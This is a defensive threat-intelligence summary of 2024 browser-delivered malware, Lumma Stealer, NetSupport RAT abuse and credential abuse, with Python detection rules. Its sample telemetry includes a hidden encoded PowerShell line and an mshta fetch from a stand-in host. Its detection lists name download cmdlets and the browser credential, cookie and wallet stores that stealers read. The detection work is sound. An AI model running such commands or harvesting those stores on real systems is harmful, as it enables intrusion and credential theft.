Browser-based cyber-threats surged in 2024, with credential abuse and infostealers on the rise
Analysis Summary
# Tool/Technique: Browser-Based Cyber-Threats (General Trend)
## Overview
This summary covers a significant shift observed in 2024 where browser-based delivery mechanisms (like drive-by downloads and malicious advertisements) have surged in prevalence, while traditional email-delivered malware has declined. This trend is driven by actors seeking to bypass conventional email security filters.
## Technical Details
- Type: Trend/Technique Dominance
- Platform: Web Browsers (Implied)
- Capabilities: Delivering malware payloads, exploiting browser vulnerabilities, facilitating social engineering.
- First Seen: Observed significant surge throughout 2024 (per eSentire TRU report).
## MITRE ATT&CK Mapping
Since this is a high-level observation of delivery trends rather than a single specific tool, primary mappings relate to initial access via web vectors:
- **TA0001 - Initial Access**
  - T1189 - Drive-by Compromise
  - T1566 - Phishing
  - T1566.003 - Spearphishing via Service (lures delivered through web platforms and advertising rather than email)
## Functionality
### Core Capabilities
- **Malware Delivery via Web:** Accounted for 70% of observed malware cases in 2024.
- **Bypassing Email Filters:** Use of non-email vectors (browsers, ads) to circumvent traditional security layers.
### Advanced Features
- Adoption of novel social engineering techniques delivered via digital means, such as "ClickFix" (a CAPTCHA deception technique) and QR code phishing.
## Indicators of Compromise
*No specific IOCs for browser-based attacks are aggregated in the report; only the associated malware families are named.*
- **Associated Malware Families (Delivered via these vectors):** Lumma Stealer, NetSupport Manager RAT.
- **Behavioral Indicators:** User interaction with malicious advertisements, automatic execution following drive-by downloads, execution initiated by deceptive CAPTCHA prompts ("ClickFix").
## Associated Threat Actors
- Cybercriminals generally leveraging evolving web delivery methods.
- Actors utilizing compromised infrastructure (e.g., YouTube channels mentioned in related articles) to distribute infostealers.
## Detection Methods
- **Behavioral detection:** Monitoring for unusual processes spawned following web browsing activity or advertisement interaction.
- **24/7 Threat Detection:** Recommended by TRU.
- **EDR Solutions:** Essential for detecting anomalous endpoint activity stemming from browser exploitation.
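The behavioral detection described above can be expressed as a rule over endpoint process-creation telemetry: a script host launched directly by a browser, or launched from the Run dialog (explorer.exe) shortly after browser activity, which is the shape of the "ClickFix" deception. The following is an added example, not code from the eSentire report; the event fields, host names, scores and sample events are constructed, and the browser/script-host lists and command-line fragments are illustrative choices, not an exhaustive detection signature.

```python
"""Added example: score process-creation events for browser-to-script-host
chains (drive-by / ClickFix shape). Event schema and samples are constructed."""
from dataclasses import dataclass

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Interpreters a browser (or the Run dialog via explorer.exe) rarely launches
# during normal use; illustrative, not exhaustive.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# Command-line fragments that raise the score when paired with the chain above.
RISKY_ARGS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden",
              "downloadstring", "invoke-webrequest", "iwr ", "curl ")


@dataclass
class ProcEvent:
    ts: int          # seconds since epoch (constructed)
    host: str
    parent: str      # parent image name
    image: str       # child image name
    cmdline: str


def score_event(ev, recent_browser_ts, window=120):
    """Return (score, reasons) for one event.

    recent_browser_ts is the last time a browser process was seen on this host;
    it ties a Run-dialog launch (explorer.exe parent) back to browsing activity.
    """
    reasons, score = [], 0
    child, parent = ev.image.lower(), ev.parent.lower()
    if child not in SCRIPT_HOSTS:
        return 0, reasons
    if parent in BROWSERS:
        score += 50
        reasons.append(f"{parent} spawned {child}")
    elif (parent == "explorer.exe" and recent_browser_ts is not None
          and 0 <= ev.ts - recent_browser_ts <= window):
        # ClickFix-style: user pastes into the Run dialog right after browsing
        score += 30
        reasons.append(f"explorer.exe spawned {child} within {window}s of browser activity")
    lowered = ev.cmdline.lower()
    hits = [a for a in RISKY_ARGS if a in lowered]
    if hits:
        score += 20 * len(hits)
        reasons.append("risky args: " + ", ".join(hits))
    return score, reasons


def detect(events, threshold=50):
    """Run over events in time order; return alerts at or above threshold."""
    last_browser = {}  # host -> ts of the most recent browser process event
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.image.lower() in BROWSERS:
            last_browser[ev.host] = ev.ts
        score, reasons = score_event(ev, last_browser.get(ev.host))
        if score >= threshold:
            alerts.append({"host": ev.host, "ts": ev.ts, "image": ev.image,
                           "score": score, "reasons": reasons})
    return alerts


# Constructed sample telemetry: one ClickFix-shaped chain, one browser-spawned
# mshta, and two benign events.
SAMPLE_EVENTS = [
    ProcEvent(1000, "ws01", "explorer.exe", "chrome.exe", "chrome.exe"),
    ProcEvent(1050, "ws01", "chrome.exe", "chrome.exe", "chrome.exe --type=renderer"),
    ProcEvent(1060, "ws01", "explorer.exe", "powershell.exe",
              "powershell.exe -w hidden -enc QUFBQQ=="),   # placeholder payload
    ProcEvent(2000, "ws02", "msedge.exe", "mshta.exe", "mshta.exe http://example.invalid/x.hta"),
    ProcEvent(3000, "ws03", "explorer.exe", "powershell.exe",
              "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcEvent(3100, "ws04", "chrome.exe", "chrome.exe", "chrome.exe --type=utility"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

In production the "recent browser activity" signal would come from window-focus or network telemetry rather than process starts, but the scoring structure is the same: the parent/child relationship carries most of the weight and command-line features only refine it.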
## Mitigation Strategies
- Implementation of Endpoint Detection and Response (EDR) solutions.
- Adoption of phishing-resistant Multi-Factor Authentication (MFA).
- Regular security awareness training focused on social engineering tactics like QR code phishing and deceptive web prompts.
## Related Tools/Techniques
- QR Code Phishing (Quishing)
- Drive-by Downloads
- Malicious Advertisements (Malvertising)
- "ClickFix" Deceptive CAPTCHA technique
- Credential Theft via Compromised Personal Devices/Supply Chain access.
***
# Tool/Technique: Lumma Stealer
## Overview
Lumma Stealer is an information-stealing malware family whose proliferation was noted as being fueled by the shift towards browser-based delivery methods. Its primary function is to harvest sensitive data from infected systems.
## Technical Details
- Type: Malware Family (Infostealer)
- Platform: Likely Windows (Standard for most modern infostealers)
- Capabilities: Information theft, harvesting credentials, session cookies, and potentially cryptocurrency wallet data.
- First Seen: Not specified, but noted as seeing a 31% increase in incidents year-on-year in 2024.
## MITRE ATT&CK Mapping
Focuses on collection and exfiltration stages typical of infostealers:
- **TA0009 - Collection**
  - T1555 - Credentials from Password Stores
  - T1555.003 - Credentials from Web Browsers
- **TA0010 - Exfiltration**
## Functionality
### Core Capabilities
- Stealing credentials and sensitive information stored on compromised endpoints.
- Delivery via surging browser-based attacks (drive-by downloads, malvertising).
### Advanced Features
- Significant year-on-year incident increase suggests active development and effective distribution channels.
## Indicators of Compromise
- *No specific IOCs provided in the context.*
- **Behavioral Indicators:** Attempted access and compilation of browser profiles, wallet data, and stored password caches.
## Associated Threat Actors
- Not explicitly named; the actors involved are those leveraging modern browser-based delivery mechanisms and social engineering.
## Detection Methods
- **Behavioral detection:** Monitoring for processes attempting to read sensitive files associated with browser data stores or credential managers.
- Signature-based detection on known Lumma Stealer payloads.
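The file-access monitoring listed above can be turned into a concrete rule: a process that is not a browser and that, within one run, reads several distinct credential stores (browser login databases, the key material needed to decrypt them, cookie jars, wallet folders) is sweeping rather than performing a routine backup. The following is an added example, not code from the report or from any vendor; the file-access event schema, process names and sample paths are constructed, and the wallet pattern is an illustrative assumption.

```python
"""Added example: flag non-browser processes that sweep several browser
credential/cookie stores. Events and process names are constructed."""
import fnmatch
from collections import defaultdict

BROWSER_OWNERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Glob patterns over normalised (lower-case, forward-slash) paths.
# Chromium and Firefox layouts are the well-known defaults; the wallet entry is
# an illustrative assumption standing in for a wallet-directory list.
SENSITIVE_PATTERNS = {
    "chromium_logins":  "*/user data/*/login data*",
    "chromium_cookies": "*/user data/*/network/cookies*",
    "chromium_keys":    "*/user data/local state",
    "firefox_logins":   "*/firefox/profiles/*/logins.json",
    "firefox_keydb":    "*/firefox/profiles/*/key4.db",
    "wallet_dir":       "*/electrum/wallets/*",
}


def normalize(path):
    return path.replace("\\", "/").lower()


def classify(path):
    """Return the sensitive-store category a path belongs to, or None."""
    p = normalize(path)
    for name, pattern in SENSITIVE_PATTERNS.items():
        if fnmatch.fnmatchcase(p, pattern):
            return name
    return None


def detect_store_sweeps(events, min_categories=2):
    """events: iterable of dicts {host, pid, image, ts, path}.

    Alerts on non-browser processes touching >= min_categories distinct store
    types. A single category is common for backup agents and sync clients;
    sweeping several (especially logins plus the key material) is the
    infostealer pattern.
    """
    touched = defaultdict(set)
    for ev in events:
        category = classify(ev["path"])
        if category is None or ev["image"].lower() in BROWSER_OWNERS:
            continue
        touched[(ev["host"], ev["pid"], ev["image"].lower())].add(category)
    alerts = []
    for (host, pid, image), cats in sorted(touched.items()):
        if len(cats) >= min_categories:
            alerts.append({"host": host, "pid": pid, "image": image,
                           "stores": sorted(cats)})
    return alerts


# Constructed sample file-access events.
SAMPLE_EVENTS = [
    {"host": "ws01", "pid": 4242, "image": "update.exe", "ts": 1,
     "path": r"C:\Users\amy\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"host": "ws01", "pid": 4242, "image": "update.exe", "ts": 2,
     "path": r"C:\Users\amy\AppData\Local\Google\Chrome\User Data\Local State"},
    {"host": "ws01", "pid": 4242, "image": "update.exe", "ts": 3,
     "path": r"C:\Users\amy\AppData\Roaming\Mozilla\Firefox\Profiles\abcd.default-release\logins.json"},
    {"host": "ws01", "pid": 1100, "image": "chrome.exe", "ts": 4,
     "path": r"C:\Users\amy\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"host": "ws02", "pid": 900, "image": "backupagent.exe", "ts": 5,
     "path": r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"host": "ws02", "pid": 900, "image": "backupagent.exe", "ts": 6,
     "path": r"C:\Users\bob\Documents\report.docx"},
]

if __name__ == "__main__":
    for alert in detect_store_sweeps(SAMPLE_EVENTS):
        print(alert)
```

The threshold on distinct categories is the tunable: raising it reduces noise from legitimate profile-migration or backup software, while keying on the pairing of a login database with its key store catches the case that matters most.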
## Mitigation Strategies
- Strong endpoint security (EDR) capable of detecting file system access related to credential harvesting.
- User education regarding suspicious advertisements or websites leading to drive-by downloads.
## Related Tools/Techniques
- NetSupport Manager RAT (Other malware delivered via similar browser vectors)
- General Infostealers
***
# Tool/Technique: NetSupport Manager RAT
## Overview
NetSupport Manager is a legitimate remote administration tool that is frequently abused by threat actors to maintain remote access to compromised systems, often delivered via the newly favored browser-based attack vectors.
## Technical Details
- Type: Potentially Unwanted Program (PUP) / Abused Legitimate Tool
- Platform: Not specified, but generally Windows/Enterprise environments.
- Capabilities: Remote control, monitoring, and file transfer capabilities used for persistence and command and control (C2).
- First Seen: N/A (Legitimate tool with a history of abuse).
## MITRE ATT&CK Mapping
Focuses on command and control and remote access:
- **TA0011 - Command and Control**
  - T1071 - Application Layer Protocol (if C2 traffic mimics legitimate traffic)
- **TA0005 - Defense Evasion**
## Functionality
### Core Capabilities
- Establishing persistence and remote access on victim machines.
- Facilitating hands-on-keyboard activity for established breaches.
### Advanced Features
- Use as a secondary payload following initial access via browser exploits.
## Indicators of Compromise
- *No specific IOCs provided in the context.*
- **Behavioral Indicators:** Unusual outbound network connections associated with remote administration ports or known legitimate NetSupport Manager C2 patterns.
## Associated Threat Actors
- Threat actors substituting traditional malware delivery with browser-based vectors for RAT deployment.
## Detection Methods
- Application whitelisting or strict inventory controls to prevent the execution of unauthorized remote access tools.
- Network monitoring for established C2 command structures used by the RAT.
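The inventory-control and network-monitoring detections above reduce to a reconciliation problem: every execution of a remote-administration tool, and every outbound connection it makes, is checked against a list of hosts, binary hashes and gateways that were deliberately approved. The following is an added example and not code from the report; the authorised inventory, hashes, host names, gateway name and all events are constructed placeholders. `client32.exe` is the NetSupport Manager client binary name; the other tool names are included only to show the rule generalises to any remote-access software.

```python
"""Added example: reconcile remote-admin tool executions and connections
against an authorised inventory. All inventory values are placeholders."""

# Image name -> product. Illustrative list; extend from your own inventory.
REMOTE_ADMIN_TOOLS = {
    "client32.exe": "NetSupport Manager client",
    "anydesk.exe": "AnyDesk",
    "teamviewer.exe": "TeamViewer",
}

# (host, image) -> set of approved SHA-256 hashes (placeholder values).
AUTHORISED = {
    ("helpdesk01", "client32.exe"): {"sha256-placeholder-approved-build"},
}

# Assumption: the only legitimate NetSupport gateway is an internal host.
AUTHORISED_SERVERS = {"nsm-gateway.corp.example"}


def check_execution(ev):
    """ev: {host, image, sha256}. Return a finding string or None."""
    image = ev["image"].lower()
    if image not in REMOTE_ADMIN_TOOLS:
        return None
    allowed = AUTHORISED.get((ev["host"], image))
    if allowed is None:
        return f"{REMOTE_ADMIN_TOOLS[image]} executed on unapproved host {ev['host']}"
    if ev["sha256"] not in allowed:
        return f"{REMOTE_ADMIN_TOOLS[image]} on {ev['host']} has unapproved hash {ev['sha256']}"
    return None


def check_connection(conn):
    """conn: {host, image, dest_host, dest_port}. Flag remote-admin tool
    connections to any destination outside the approved gateway set."""
    image = conn["image"].lower()
    if image not in REMOTE_ADMIN_TOOLS:
        return None
    if conn["dest_host"] not in AUTHORISED_SERVERS:
        return (f"{REMOTE_ADMIN_TOOLS[image]} on {conn['host']} connected to "
                f"unapproved {conn['dest_host']}:{conn['dest_port']}")
    return None


def audit(exec_events, conn_events):
    """Return every finding from both checks, executions first."""
    findings = [f for f in map(check_execution, exec_events) if f]
    findings += [f for f in map(check_connection, conn_events) if f]
    return findings


# Constructed sample telemetry.
SAMPLE_EXEC = [
    {"host": "helpdesk01", "image": "client32.exe", "sha256": "sha256-placeholder-approved-build"},
    {"host": "ws07", "image": "client32.exe", "sha256": "sha256-placeholder-unknown"},
    {"host": "ws08", "image": "notepad.exe", "sha256": "sha256-placeholder-notepad"},
    {"host": "helpdesk01", "image": "client32.exe", "sha256": "sha256-placeholder-tampered"},
]
SAMPLE_CONN = [
    {"host": "helpdesk01", "image": "client32.exe", "dest_host": "nsm-gateway.corp.example", "dest_port": 443},
    {"host": "ws07", "image": "client32.exe", "dest_host": "203.0.113.10", "dest_port": 443},
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_EXEC, SAMPLE_CONN):
        print(finding)
```

Keying the allowlist on host and hash rather than on file name is what makes this hold up against a renamed or repackaged copy of the tool; a name-only allowlist would pass the `ws07` execution.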
## Mitigation Strategies
- Strict control over the deployment and execution of remote administration software.
- Network segmentation to limit the damage from a compromised endpoint running a RAT.
## Related Tools/Techniques
- Unauthorized use of legitimate remote access tools.
***
# Technique: Credential Abuse / Compromised Credentials
## Overview
Credential abuse emerged as the most common initial access vector in 2024. This technique relies on threat actors obtaining valid credentials (often cheaply available on fraud marketplaces) to directly infiltrate corporate environments, bypassing many traditional malware delivery defenses.
## Technical Details
- Type: Technique / Initial Access Vector
- Platform: All (Relies on harvested credentials for OS/Application login)
- Capabilities: Direct login to corporate resources, email, and systems without needing to execute malware on the endpoint first.
- First Seen: Significant uptick noted in 2024.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1078 - Valid Accounts
  - T1078.002 - Domain Accounts
  - T1078.003 - Local Accounts
  - T1078.004 - Cloud Accounts
## Functionality
### Core Capabilities
- Use of credentials costing as little as $10 to gain initial entry.
- Infiltration traced to contractor devices compromised by infostealers, highlighting a supply chain risk.
### Advanced Features
- Exploiting the effectiveness of compromised credentials as a "trusted" entry point that often bypasses gateway security focusing on file-based threats.
## Indicators of Compromise
- **Behavioral Indicators:** Logins from geographically unusual locations, usage of known compromised accounts, anomalous user activity following login from third-party/contractor accounts.
## Associated Threat Actors
- Cybercriminals purchasing stolen data from fraud marketplaces.
- Actors targeting supply chain access via vendor/contractor accounts.
## Detection Methods
- **Behavioral detection:** Anomaly detection on user logins and entitlement checks.
- Implementation of **Phishing-Resistant MFA** as the key defense against stolen credentials.
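The anomaly-detection approach above can be made concrete by scoring each authentication session on the signals the report calls out: a login from a country the user has never used, an account that appears in an exposure feed (such as infostealer log dumps), a contractor account performing actions outside its remit, a session protected by something weaker than phishing-resistant MFA, and two sessions too close together to be the same person travelling. The following is an added example, not code from the report; the baselines, account names, exposure list, action names and events are all constructed.

```python
"""Added example: score authentication sessions for credential-abuse signals.
Baselines, account names and events are constructed."""
from collections import defaultdict

# Countries each user has been seen from recently (constructed baseline).
BASELINE_COUNTRIES = {"amy": {"US"}, "vendor-bob": {"CA"}, "carol": {"US", "GB"}}
# Accounts reported by an exposure feed, e.g. infostealer log dumps (constructed).
KNOWN_EXPOSED = {"vendor-bob"}
CONTRACTOR_ACCOUNTS = {"vendor-bob"}
# Actions a contractor account is not expected to perform (constructed).
PRIVILEGED_ACTIONS = {"add_role_member", "create_inbox_rule", "download_bulk"}


def score_session(user, events):
    """events: one session's events sorted by ts, each
    {ts, user, session, country, mfa ("fido2"|"otp"|"none"), action}."""
    reasons, score = [], 0
    login = events[0]
    if login["country"] not in BASELINE_COUNTRIES.get(user, set()):
        score += 40
        reasons.append(f"login from new country {login['country']}")
    if user in KNOWN_EXPOSED:
        score += 30
        reasons.append("account appears in exposure feed")
    if login["mfa"] != "fido2":
        # OTP or no MFA does not stop a replayed session or a phished code
        score += 20
        reasons.append(f"non-phishing-resistant MFA ({login['mfa']})")
    if user in CONTRACTOR_ACCOUNTS:
        priv = [e["action"] for e in events if e["action"] in PRIVILEGED_ACTIONS]
        if priv:
            score += 30
            reasons.append("contractor performed " + ", ".join(priv))
    return score, reasons


def detect(events, threshold=60, travel_window=3600):
    """Group events into sessions, add an impossible-travel check across a
    user's consecutive sessions, and return alerts in time order."""
    sessions = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        sessions[(ev["user"], ev["session"])].append(ev)
    last_login = {}  # user -> (ts, country) of the previous session start
    alerts = []
    for (user, sid), evs in sorted(sessions.items(), key=lambda kv: kv[1][0]["ts"]):
        score, reasons = score_session(user, evs)
        first = evs[0]
        prev = last_login.get(user)
        if prev and prev[1] != first["country"] and first["ts"] - prev[0] < travel_window:
            score += 40
            reasons.append(f"{prev[1]} -> {first['country']} within {first['ts'] - prev[0]}s")
        last_login[user] = (first["ts"], first["country"])
        if score >= threshold:
            alerts.append({"user": user, "session": sid, "ts": first["ts"],
                           "score": score, "reasons": reasons})
    return alerts


# Constructed sample sign-in and activity events.
SAMPLE_EVENTS = [
    {"ts": 10, "user": "amy", "session": "s1", "country": "US", "mfa": "fido2", "action": "read_mail"},
    {"ts": 100, "user": "vendor-bob", "session": "s2", "country": "CA", "mfa": "otp", "action": "read_mail"},
    {"ts": 130, "user": "vendor-bob", "session": "s2", "country": "CA", "mfa": "otp", "action": "create_inbox_rule"},
    {"ts": 200, "user": "carol", "session": "s3", "country": "GB", "mfa": "fido2", "action": "read_mail"},
    {"ts": 1000, "user": "carol", "session": "s4", "country": "BR", "mfa": "fido2", "action": "read_mail"},
    {"ts": 5000, "user": "amy", "session": "s5", "country": "US", "mfa": "otp", "action": "read_mail"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Note how the contractor session scores highly even though its country matches the baseline: the exposure-feed hit plus out-of-remit actions is exactly the "infostealer on a contractor device" chain the report describes, and geography alone would have missed it.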
## Mitigation Strategies
- Mandatory **Phishing-Resistant MFA** implementation across all accounts.
- Rigorous monitoring of initial access events, especially those originating from third-party or contractor connections.
- Strong patch management for endpoints used by vendors/contractors (since these devices might harbor infostealers).
## Related Tools/Techniques
- Phishing (The primary method for initially harvesting the credentials later abused).